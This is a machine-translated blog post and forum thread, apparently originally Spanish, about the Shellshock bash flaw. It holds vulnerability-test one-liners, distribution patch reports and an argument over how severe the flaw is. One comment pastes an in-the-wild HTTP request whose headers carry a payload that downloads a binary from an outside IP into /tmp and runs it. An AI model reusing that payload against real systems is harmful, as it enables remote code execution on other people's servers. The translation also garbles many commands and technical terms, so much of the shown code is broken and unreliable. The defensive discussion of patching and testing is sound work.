Ibaleka njengomlilo wasendle kwezinye iiblogi, ibali elipapashwe kwifayile ye- yokhuseleko blog de Red Hat malunga nokuba semngciphekweni okufumaneka eBhash ngenxa yokusetyenziswa gwenxa kwezinto eziguquguqukayo kwihlabathi. Ngokutsho kweendaba zokuqala:
"… Ukuba sesichengeni kungenxa yokuba imeko-bume engafaniyo enamaxabiso ayilwe ngokukodwa inokwenziwa ngaphambi kokubiza i-bash shell. Ezi zinto zixabisekileyo zinokuba nekhowudi eqhutywa kwakamsinya nje ukuba iqokobhe lifakwe. Igama lezi zinto zixabisekileyo azinamsebenzi, yimixholo yazo kuphela. Ngenxa yoko, obu bungozi buvezwa kwimeko ezininzi, umzekelo:
- ForceCommand isetyenziswa kuqwalaselo lwe-sshd ukubonelela ngomda wokuphunyezwa komyalelo kubasebenzisi abakude. Esi siphoso sinokusetyenziselwa ukunqanda oko kunye nokubonelela ngokuqhutywa komyalelo. Olunye uphunyezo lweGit kunye nokuGuqulwa lusebenzisa iiShells ezinqandiweyo. Ukusetyenziswa rhoqo kwe-OpenSSH akuchaphazeleki njengoko abasebenzisi sele benofikelelo kwikhonsoli.
- Iseva ye-Apache isebenzisa i-mod_cgi okanye i-mod_cgid iyachaphazeleka ukuba izikripthi ze-CGI zibhalwe zombini kwi-bash, okanye zivelisa i-sublevels. Imigangatho enjalo isetyenziswa ngokungagungqiyo yinkqubo / popen kwi-C, ngo-os. System / os.popen kwiPython, ukuba usebenzisa inkqubo / yenza iqokobhe kwi-PHP (xa usebenza kwimowudi ye-CGI), kwaye uvule / inkqubo ePerl (exhomekeke kwintambo yomyalelo).
- Izikripthi ze-PHP eziqhutywa nge-mod_php azichaphazeleki nokuba kudlalwe izihlunu.
- Abaxhasi be-DHCP bangenisa izikripthi zeqokobhe ukulungiselela inkqubo, kunye namaxabiso athathwe kwiserver enokuba nobungozi. Oku kuyakuvumela ukuba kwenziwe imiyalelo engenakuphikiswa, ihlala iyingcambu, kumatshini wabathengi be-DHCP.
- Iidemem ezahlukeneyo kunye neenkqubo ezinamalungelo e-SUID zinokwenza izikripthi zeqokobhe kunye namaxabiso asingqongileyo asetiweyo / aphembelelwe ngumsebenzisi, anokuvumela ukuba kwenziwe imiyalelo engenakuphikiswa.
- Nasiphi na esinye isicelo esikhonkxa kwiqokobhe okanye sisebenzisa ishell script njengokusebenzisa i-bash njengetoliki. Izikripthi zeShell ezingathumeli izinto eziguquguqukayo azikho semngciphekweni kule ngxaki, nokuba ziqhuba umxholo ongathembekanga kwaye uzigcina Iigobolondo eziguquguqukayo (ngasekhohlo) kunye neendlela ezivulekileyo ezivulekileyo.
... "
Ungazi njani ukuba ibhash yam ichaphazelekayo?
Ngenxa yoku, kukho indlela elula kakhulu yokwazi ukuba siyachaphazeleka kolu bungozi. Ngapha koko, ndivavanye ii-Antergos zam kwaye kubonakala ngathi andinangxaki. Into ekufuneka siyenzile ukuvula i-terminal kwaye sibeke:
env x = '() {:;}; sengozini 'bash -c "echo olu luvavanyo"
Ukuba iphuma ngale ndlela asinangxaki:
env x = '() {:;}; echo sengozini 'bash -c "echo olu luvavanyo" bash: isilumkiso: x: ukungahoyi inkcazo yomsebenzi ukuzama bash: impazamo yokungenisa inkcazo yomsebenzi ye `x' Olu luvavanyo
Ukuba iziphumo zahlukile, kuya kufuneka usebenzise amajelo ohlaziyo osasazo olukhethiweyo ukubona ukuba sele beyisebenzisile ipatch. Uyazi ke 😉
Ukuhlaziywa: Esi sisiphumo esivela kumntu osebenza naye usebenzisa Ubuntu 14:04:
env x = '() {:;}; echo sengozini 'bash -c "echo olu luvavanyo" olusengozini olu luvavanyo
Njengoko ubona, ukuza kuthi ga ngoku isengozini.
NdineKubuntu 14.04 ukusuka kuma-64 kwaye ndifumana:
env x = '() {:;}; sengozini 'bash -c "echo olu luvavanyo"
khu seleka
Olu luvavanyo
Sele ndihlaziyiwe, kodwa ayilunganga. Kwenziwe ntoni?
Linda ukuba bahlaziye. Sele i-EOS umzekelo ihlaziyiwe .. 😀
Kuyothusa kanjani, ndikwanayo neKubuntu 14.04
$ env x = '() {:;}; sengozini 'bash -c "echo olu luvavanyo"
bash: isilumkiso: x: ukungahoyi inkcazo yomsebenzi
bash: Impazamo yokungenisa inkcazo yomsebenzi ye `x '
Olu luvavanyo
Ndiyongeza ukuba uhlobo lwepakethe ye "bash" ekhutshelwe namhlanje yile:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Kwimeko yam, ndinika lo myalelo, undinika nje oku kulandelayo kwisiphelo sendlela:
>Ngapha koko, ihlaya kukuba ndihlaziye iDebian Wheezy kwaye yile nto indilahlileyo.
I-Wheezy isengozini kwinxalenye yesibini yebug, ubuncinci emva kwemini (UTC -4: 30) ingxaki ibisalandela:
Ndiqinisekisile nje ukuba emva kokufaka uhlaziyo ngale ntsasa akuyi kuchaphazeleka iSlackware okanye iDebian okanye iCentos njengoko befumana uhlaziyo oluhambelanayo.
Yintoni ebangela Ubuntu ukuba sesichengeni ngeli lixa? Kwaye ndixelele kukhuselekile: D.
Kodwa ukhe wazama ukuhlaziya Ubuntu?
Ngokuhlaziywa kwanamhlanje baye bayilungisa.
OK
Iingcali zokhuselo zilumkisa ngobungozi be-'Bash ', inokuba sisoyikiso kubasebenzisi beLinux yeSoftware kune-Heartbleed bug, apho abahlaseli banokuxhaphaza i-bug eBhash ukuthatha ulawulo olupheleleyo lwenkqubo.
UTod Beardsley, umphathi wobunjineli kwinkampani yezokhuseleko kwi-Rapid7, walumkisa ukuba isiphako silinganiswe nge-10 ngobukrakra baso, okuthetha ukuba sinefuthe eliphezulu, kwaye sikalwe "sisezantsi" kubunzima bokuxhaphaza, okuthetha ukuba kulula kakhulu 'kubakhweli' uhlaselo. Ngokusebenzisa le meko, abahlaseli banokuthi bathathe ulawulo lwenkqubo yokusebenza, bafikelele kulwazi oluyimfihlo, benze utshintsho, njl., Utshilo uBeardley. "Nabani na oneenkqubo ezihlala eBash kufuneka afake isicelo ngokukhawuleza," wongeze watsho.
NGAPHAMBI KWENKOLELO EBONISA ISIXHOBO ESIDALA (GNU) apho iBach ibanjwe khona, kuya kuba lula ngakumbi kwiLinux Software ukulahla i-GNU kunye nokutshintsha kwesixhobo se-BSD.
I-PS: SUKUQINISEKISA inkululeko yam yokuthetha, ... ungathuki mntu, ... musa ukuwucima umyalezo wam njengomyalezo wangaphambili endisusiweyo!
Owu nceda ungayibaxi. Indlela endibacaphukela ngayo abo bantu basebenzisa i-BSD kwaye bayayidelela i-GNU, iLinux okanye nantoni na evela kwezi projekthi.
Ndikunye nawe kwaye unyanisile ngokumalunga nobunzima balo mngxunya.
Kwakungekho ukunyanzeliswa, kwakungafunekiyo (wenze ingxelo efanayo kwi-gnome 3.14 post)
«… Kwaye ikalwe 'PHANTSI' NGENXA yobunzima bokuxhaphaza, into ethetha ukuba ilula kakhulu kuhlaselo lwehacker»
Ngaba ukungaziphathi kakuhle kuyabonakala?
Kunokuba lula njani ukuxhaphaza ukuba sesichengeni kwaye kwangaxeshanye ube nenqanaba lomngcipheko "ophantsi" ngenxa yokuba kunzima ukusebenzisa?
Yisiphene esonjululwe kungaphelanga neeyure zokwazana kwaye, njengentliziyo ethambileyo, ayinazo iingxelo zokuxhatshazwa (Ewe kunjalo, oku kunexesha elincinci lokwazana).
Isicinezeli se-tabloid esingaphezulu komngcipheko wokwenene.
Ngaba i- @ Staff ibonakala ingabalulekanga kuwe? Uzakundixelela ntoni ngoku?
I-GET./.HTTP/1.0
Ummeli woMsebenzisi: Enkosi-Rob
Ikuki: (). {.:;.}; Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Umgcini: (). {.:;.}; Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Umhlanguli: (). {.:;.}; Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Yamkela :. * / *
$ ifayile nginx
I-nginx: ELF 32-bit LSB ephumelelayo, i-Intel 80386, inguqulelo 1 (SYSV), edityaniswe ngokwezibalo, ye-GNU / Linux 2.6.18,
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Ngaba uyazi ukuba yintoni? Akukho nto inobungozi ...
Imeko imbi kakhulu, kodwa ukusuka apho ukuya ekubeni ungayeka ukusebenzisa i-bash kukhetho lwe-BSD, sele ikho ubukhulu becala, nangona kunjalo uhlaziyo sele lukhona, ndichukumisa nje uhlaziyo kwaye ayikho enye into.
Ngoku i-PD, ndicinga ukuba isebenzisana ngakumbi @robet, andicingi ukuba apha abalawuli bazinikele ekususeni izimvo ezinje kuba ewe, kuba, kuba ndithathe inxaxheba kolu luntu bendinalo olovakalelo kwaye ndiyathemba ukuba ihlala ihleli indlela.
Ukubulisa
Ubeka ingxelo efanayo kwizithuba ezimbini ezahlukeneyo. Ukuba uzama ukukhuthaza "umthombo" weendaba, uxolo, ayisiyiyo le ndawo.
I-Bash ivela kwi-Unix (kunye ne-GNU clone). Iinkqubo ezisekwe kwi-BSD ezinje nge-OSX nazo ziyachaphazeleka, kwaye ngokweGenbeta, abakayifaki ngoku. Ngokufanayo, ukufikelela kwiBhash ufuna iakhawunti yomsebenzisi, nokuba yeyasekhaya okanye ngeSSH.
@ Abasebenzi:
I-1.Ihlelwa njengeNqanaba 10 (ubuninzi benqanaba lobungozi) ngenxa yemali yeenkonzo ezinokuchaphazeleka yibug. Kwinqaku eliphambili bayayicacisa loo nto, besithi i-bug inokuchaphazela iinkonzo ezinje nge-apache, sshd, iinkqubo ezinemvume yokuzimela (xorg, phakathi kwabanye).
Ihlelwe njengeNqanaba eliPhantsi lobunzima, xa kufikwa ekuphunyezweni kwayo, kwaye owona mzekelo ubalaseleyo woku sisicatshulwa sokuvavanya ukuba sesichengeni esibekwe ngu- @elav kwisithuba. Kunzima kakhulu ukuphumeza ayikho, njengoko ubona.
Andikuboni ukungafuneki kolwazi (ndibona kuphela uguqulo lukaGoogle) kwaye ukuba ingxaki imbi kakhulu, kwaye njengoko usitsho, sele inendawo kunye nesisombululo, kodwa ayisiyiyo loo nto, ayiseyiyo ingozi, kwaye iyinyani.
@petercheco / @Yukiteru
Sukunditolika gwenxa, ndicinga ukuba kuyacaca ukuba ukugxeka kwam ziindaba zokuba iRobet inxibelelana kwaye ijolise ekuziphatheni okungalunganga kwaye ingekuko ukungafuneki kwakhona.
Ngendlela efanayo, kufuneka sahlule phakathi komngcipheko nobungozi (andiyikhankanyi le yokugqibela), sihlala sizisebenzisa njengezithetha-ntonye, kodwa apha, ingozi iya kuba ngumonakalo kumonakalo we-bug kunye nomngcipheko wokuvela kwayo.
Kwimeko yam ethile, ndingene izolo. Ayenzelwanga uluhlu lweposi okanye nantoni na enjalo. Ndithathe umnxeba ndathumela umyalezo kwi-sysadmin enelinki kwaye ndangqina ukuba ndinayo yonke into, emva koko ndicela uxolo kodwa ezi ndaba azindenzi ndingalali.
Kwezinye iiforamu bachaza malunga nokuba semngciphekweni kweBash, "isisombululo esakhutshwa nguDebian no-Ubuntu", kodwa namhlanje bafumanise ukuba umngcipheko usekhona, ke isisombululo besingaphelelanga, bayayichaza loo nto!
Ndiyabona ukuba uninzi lundigxekile ngenxa yenyani elula yokuthintela abantu kubuzaza bobuthathaka -kufanelekile kwinqanaba le-10 lobungozi obukhulu, kwaye ndikhankanya izisombululo ezinokubakho kwiLinux Software ebusweni besixhobo se-GNU esidlulileyo apho iBash ibanjwe khona Ngokugqibeleleyo i-GNU inokutshintshwa ngesixhobo se-BSD kwiLinux Software,… ndiyasebenzisa iLinux kwaye ndiyayithanda iLinux!
Ndiyacacisa ukuba iBash ayizi ngokungagqibekanga efakwe kwi-BSD, yenye yeephakheji yokuhambelana kweLinux enokuthi ifakwe kwi-BSD ... ewe!. Kwaye umthombo ubekwa ukuze bajonge iindaba, kuba uninzi lwabasebenzisi ngamanye amaxesha abakholelwa umyalezo okanye uluvo.
irobhothi: Njengoko sele bekuxelele kaninzi, sele ubeke uluvo lwakho kunye neendaba ngeposi, awunyanzelekanga ukuba uzifake kuyo yonke iposti oyiphawulayo.
Kwi-bash, zikhona ezinye iigobolondo ezinokusetyenziswa kwimeko yokuba iBash ibuthathaka. 😉
Irobhothi, endiyaziyo akukho software edibanisa i-linux kernel kunye ne-BSD yomsebenzisi. Eyona nto ikufutshane yenye indlela ejikeleze, kBSD + GNU, njengoko uGentoo noDebian besenza. Ngaphandle koko, i-GNU (1983) ayinakubizwa ngokuba "yeyakudala" ukuba emva kwe-BSD (1977). Bobabini babelana ngengcambu ye-unix (kodwa hayi ikhowudi), ngekhe kubekho "ukuhambelana kweLinux" ukuba iBash yenziwa xa uLinus T wayesengumntwana.
Uff, uvavanyo lwe-debian ngeli xesha "lusemngciphekweni" yeyiphi i-streak esinayo ...
Ndisebenzisa uvavanyo lweDebian kwaye nakweli sebe sifumene uhlaziyo lwe-bash
ngokwe genbeta kukwakho nobunye ubungozi
http://seclists.org/oss-sec/2014/q3/685
umyalelo wokubuza ngu
env X = '() {(a) => \' sh -c "isemngciphekweni"; I-bash -c "i-echo isilele i-2 engathathwanga"
env X = '() {(a) => \' sh -c "isemngciphekweni"; bash -c "echo Ukungaphumeleli ukungaphumeleli ukusilela 2" sh: X: umgca 1: impazamo yesintactic kufutshane nento engalindelekanga `= 'sh: X: line 1:`' 'sh: error importing function definition for `X' sh: vulnerable: command not found Ukungaphumeleli 2 ngaphandle kokulungiswangokufanayo nam.
Nalapha kunjalo. Kodwa i-bug yoqobo kwiposti yayifakwe kwi-L) Ubuntu 14.04
Endaweni yokwenza i-echo elula ukuzama ukuwenza umyalelo ofuna amalungelo, ndilahla "amalungelo awonelanga" ... le bug ayizukunyusa amalungelo? Ukuba ayinyusi amalungelo oko akunabungozi njengoko bepeyinta.
Ulungile!! babini babuthathaka ...
Kum eLinux Mint 17 emva kohlaziyo lwesibini lwe-bash abalubeke kwii-Ubuntu zokugcina ebusuku, xa usenza lo myalelo iqokobhe linikezela ngesi siphumo:
env X = '() {(a) => \' sh -c "isemngciphekweni"; I-bash -c "i-echo isilele kwi-2 engathathwanga"
>
Inguqulelo ka "bassh" ebibekwe kwindawo yokugcina ubuntu yokuhlaziya eyangaphambili yile:
4.3-7ubuntu1.2
Kwiinkqubo ezikhethwe nguDebian ungajonga ingxelo efakiweyo ngalo myalelo:
dpkg -s bash | Inguqulelo ye-grep
Ngapha koko, kufanele icaciswe, ubuncinci kubasebenzisi beDebian, Ubuntu kunye neMint; Akufanelekanga ukuba uxhalabise kakhulu ngeenkqubo ezisebenzisa izikripthi nge #! / Bin / sh header kuba kulwabiwo / ibin / sh ayibizi "bash", kodwa ibophelela kwiqokobhe "dash" (dash ngu :)
I-Debian Alchemist Console (dash) sisiseko sePOSIX
lothuthu.
.
Kuba iphumeza izikripthi ngokukhawuleza kune-bash, kwaye inezixhomekeko ezimbalwa
amathala eencwadi (enza ukuba yomelele ngakumbi ngokuchasene nokusilela kwesoftware okanye
ihardware), isetyenziswa njengekhonkco lenkqubo emiselweyo kwiisistim
I-Debian.
Ke, ubuncinci ku-Ubuntu, "bash" isetyenziswa njengeqokobhe lokungena komsebenzisi (kunye nomsebenzisi wengcambu). Kodwa nawuphi na umsebenzisi angasebenzisa enye igobolondo ngokungagqibekanga kumsebenzisi kunye neengcambu zengcambu (iiterminal).
Kulula ukujonga ukuba iqokobhe liqhuba iskripthi (#! / Bin / sh) ngokwenza le miyalelo:
ifayile / ibin / sh
(Iziphumo ngu / bin / sh: uphawu lokomfuziselo ku `dash ') silandela umkhondo wokuphinda umyalelo
ifayile / ibin / dash
Iziphumo ngu / bin / dash: ELF 64-bit LSB into ekwabelwana ngayo, x86-64, uguqulelo 1 (SYSV) ke oku kuyenzeka.
Ezi ziziphumo kusasazo lweLinux Mint 17. Kwezinye i-non-Ubuntu / i-Debian esekwe kusasazo zinokwahluka.
Akukho nzima ukutshintsha iqokobhe elingagqibekanga !! ungasebenzisa eyahlukileyo kubasebenzisi kunye nomsebenzisi wengcambu. Ngokwenyani kufuneka ufake igobolondo oyikhethileyo kwaye utshintshe okungagqibekanga ngomyalelo "chsh" okanye ngokuhlela / njl / ifayile yokudlula (nangona abasebenzisi abangazaziyo iziphumo zempazamo xa behlela ifayile "yokupasa", Kungcono ukuba uzazise kakuhle kwaye ngaphambi kokuyihlela, yenza ikopi yentsusa xa kunokwenzeka ukuba uyifumane kwakhona.
Ndiziva ndikhululeke ngakumbi nge "tcsh" (tcsh yile :)
Ikhonsoli ye-TENEX C, inguqulelo ephuculweyo yeBerkeley csh
"Csh" yile nto wasebenzisa iMac OS X kwiminyaka embalwa edlulileyo. Into enengqiqo ngokujonga ukuba uninzi lwenkqubo yokusebenza ye-Apple yikhowudi yeFreeBSD. Ngoku kwizinto endizifunde izolo, kuyabonakala ukuba zikwabonelela nge "bash" kwiitheminali zomsebenzisi.
IMISEBENZI:
Iinguqulelo ze "bash" eziguqulweyo zezona zisasetyenziswayo zisasazwe
- "bash" inguqulelo 4.3-7ubuntu1.2 kwaye kamva ayiqulathanga ezi bugs
-Akunyanzelekanga ukusebenzisa i "bash" kwi-OS * Linux
-Zimbalwa * iLinux zonikezelo lwekhonkco #! / Bin / sh nge "bash"
- Kukho ezinye iindlela: uthuthu, idash, i-csh, i-tcsh nezinye
-Ayonto inzima ukutshintsha iqokobhe elingagqibekanga elibizwa yinkqubo xa uvula i-terminal
-Zimbalwa izixhobo ezincinci (ii-routers kunye nezinye) zisebenzisa "bash", kuba inkulu kakhulu !!
Okwangoku kuye kwafika olunye uhlaziyo olufakela olunye uhlobo lwe "bash" 4.3-7ubuntu1.3
KwiLinux Mint 17 kunye Ubuntu 14.04.1 LTS
I-ArchLinux ingenise ingxelo bash-4.3.026-1
@ Xurxo… .csh evela eBerkeley?,… Uyayiqonda into endiyithetha ngentla apha, kwaye kungcono ukusebenzisa i-BSD “csh”… endaweni yesixhobo esidala se-GNU apho iBash ibanjelwe khona. Esi sixhobo sesona silungileyo kwiLinux Software.
Ndicinga ukuba le bug
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
yinyani?
Isisombululo ke ngoku?
Lindela ukuba bahlaziye iphakheji kwi-distro yakho
Ibhugi yabhaptizwa njengeqokobhe
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
khu seleka
Olu luvavanyo
Akukho qhekeza okwangoku leBuntu Studio 14.04
Ilungiswe kwi-Ubuntu Studio 14.04.1
i-wisp @ ubuntustudio: ~ $ env x = '() {:;}; sengozini 'bash -c "echo olu luvavanyo"
bash: isilumkiso: x: ukungahoyi inkcazo yomsebenzi
bash: Impazamo yokungenisa inkcazo yomsebenzi ye `x '
Olu luvavanyo
Ngokwenyani sesichengeni esincinci, ukuba siyakuchaphazela, kukuba ubusenza into engalunganga ngaphambili ...
Kungenxa yokuba iskripthi sebash esisebenza ngamalungelo engcambu akufuneki sivezwe kumsebenzisi. Kwaye ukuba ubaleka ngaphandle kwamalungelo, akukho bulnerability enjalo. Ngokwenyani, bubudenge. Ukoyikisa okuninzi.
Ndicinga okufanayo.
Ngokuchanekileyo, ukuthengisa amaphephandaba ngakumbi okanye ukutyelelwa ngakumbi, ezi bugs zilungile.
Kodwa bahlala belibala ukukhankanya ukuba ukuze ulalanise ikhompyuter kunye nezi ntlobo zeempendulo, kufuneka uqale ube nokufikelela kwi-bash kwaye ube nayo njengengcambu.
abasebenzi ukuba usebenzisa i-apache ene-cgi faka nje ii-headers ze-http njengekhukhi okanye uhambise umsebenzi ofuna ukuwenza. Kuye kwasetyenziselwa ukusasaza iintshulube.
kwaye ukuba umntu ubeka iqokobhe kwiserver nge-wget mishell.php, kwimeko leyo ayisiyongozi, akunjalo?
Vumelana nawe. Ndacinga ukuba yayiyimpazamo enkulu njengaleyo ikwi-Heartbleed (nditsho ne-NSA yazibophelela ekunyangeni isifo), kodwa ngapha koko yayiyimpazamo encinci.
Kukho ezinye iibugs ezinzulu njengokusetyenziswa kwe-Flash okuphambeneyo kunye nokwehla kokusebenza kwiPepper Flash Player, kunye esele ilungisiwe. I-webRTC bug kwiChannel nakwiFirefox.
Ngaba uyazi ukuba inelungiselelo labantu abaneLinux Mint 16?
Kuvavanyo lweDebian yayisele ilungisiwe.
Kwi-5 distros isonjululwe, kwi-OS X yam andazi.
Nceda ungaluhlolisisi uluvo lwam, ndithe i-OS X. Andazi ukuba ungathi OS X kule ndawo.
@yoyo kakuhle musa ukuyikhupha kakhulu ukuba basasebenza kwezinye iinkcukacha zepatch ... zama oku kwaye undixelele, hamba XD
env x = '() {:;}; I-echo isengozini 'bash -c "ndibesengozini ngakumbi kune-iphone 6 inkunkuma"
Ukuba bayisombulule i-100% ngaphambi kwe-OS X ndibheja nantoni na
Ewe, nakwi-Ars Technica banika ukubaluleka kweBash kwi-OSX.
@Yoyo uphawule ngokulandelayo kwi-OS X ye-SPAM .. lla tu ugcine .. 😛
@yoyo apho ukulungisa iikowuti ... kodwa ezinye uyazazi 😉
I-FSF ithethile
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Njengokuba sele bexhasa i-OSX (kuba i-OSX isasebenzisa iBash: v).
Ngapha koko, akukho mfuneko yokuba ndiphazamisane noDebian Jessie kakhulu.
Ukuba le nkqubo ichaphazeleka kwi-Cent OS:
yum zicoce zonke && yum uhlaziyo bash
ukubona uguqulelo lwe-bash:
rpm -qa | grep bash
Ukuba ingxelo ingaphambilana kune-bash-4.1.2-15.el6_5.1 inkqubo yakho inokuba sesichengeni!
Ukubulisa
Ubungozi be-2 abukasonjululwa
i-env iguquguqukayo2 = '() {(a) => \' sh -c "i-echo ayinokuchaphazeleka"; I-bash -c "i-echo isilele i-2 engathathwanga"
Iyahlaziya ...
Okuchasene kwenzeka kum kwi-Gentoo, ndisemngciphekweni wokuqala ukusilela kodwa okwesibini ndiyifumana le:
[ikhowudi] sh: X: umgca 1: impazamo yesintactic kufutshane nento engalindelekanga `= '
sh: X: umgca 1: ''
sh: impazamo yokungenisa inkcazo yomsebenzi ye `X '
sh: abasesichengeni: umyalelo awufumaneki
I-Bug 2 ayifakwanga
[/ ikhowudi]
Andazi ukuba sele kuza kubakho uguqulelo oluzinzileyo lweBash kunye neebugs ezilungisiweyo, kodwa nokuba yeyiphi na indlela iya kuba ilindile kwixesha elizayo xa ndiza kuvela -sync && emerge -update -deep –with-bdeps = and - newuse @world (yindlela yokuhlaziya inkqubo yonke).
NdineGentoo enenguqulo 4.2_p50 kwaye ukuza kuthi ga ngoku iphumelele zonke iimvavanyo. Zama ukuvela -sync kwaye uvele -av1 app-shells / bash, kwaye ujonge uguqulelo 4.2_p50 usebenzisa i-bash -version command.
Uzamile oku?
Kwaye kunye neephakeji ezintsha, uvavanyo olutsha esilunikwa yiRed Hat
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "umhla we-echo"; ikati / tmp / echo
Ukuba inkqubo yethu ayinabungozi kwaye ipakishwe ngokuchanekileyo, kuya kufuneka isinike into enje
1 umhla
Ikati e-2: / tmp / echo: Ifayile okanye isikhombisi asikho
Zama ngale ndlela:
env X = '() {(a) => \' sh -c "isemngciphekweni"; I-bash -c "isilele ukusilela kwe-2
ndiyafumana
khu seleka
I-Bug 2 igqityiwe.
Ulibale, umgca ufomethwe kakubi.
Kulungile! Sele ndiyenzile uhlaziyo kwi-Slackware yam, enkosi!
Molo, kuphakama umbuzo, ndinamaseva aliqela ane "SUSE Linux Enterprise Server 10" 64-bit.
Xa ndiphumeza imiyalelo ndisengozini, ndisesichengeni ngakumbi kunodoti we-iPhone 6 xD
Ukuba andiphazami ukuhlaziya / ukufaka iipakeji kwi-SUSE kwenziwa ngomyalelo «zypper».
Kwezinye iiseva indixelela oku:
OKUHLE: ~ # zypper up
-bash: zypper: umyalelo awufumaneki
OKUQHELEKILEYO: ~ #
Kwaye kwabanye oku:
SMB: ~ # zypper phezulu
Buyisela imithombo yenkqubo ...
Ukucoca imethadatha yeSUSE Linux Enterprise Enterprise 10 SP2-20100319-161944…
Ukwahlula isiseko sedatha ...
isishwankathelo:
Akho nto Yokwenza.
Into endiyenzayo?
Ndiyazi ukuba abanye bathi ukuba sesichengeni kungaphantsi kwento abayipeyintayo kodwa ndinayo kwaye andifuni kuvezwa emngciphekweni, nokuba mncinci okanye mkhulu.
Ukubulisa
Molo ngokuhlwa, ndizamile ukunamathisela ikhowudi oyinike yona kwinqaku, ndiyayifumana
iisanders @ pc-sanders: ~ $ env x = '() {:;}; sengozini 'bash -c "echo olu luvavanyo"
Olu luvavanyo
iisanders @ ii-pc-sanders: ~ $
Ndicela undicacisele indlela yokupakisha i-distro, ndihlaziya imihla ngemihla kwaye andiboni lutshintsho kwimveliso ekhawulezileyo.
Ndiyabonga!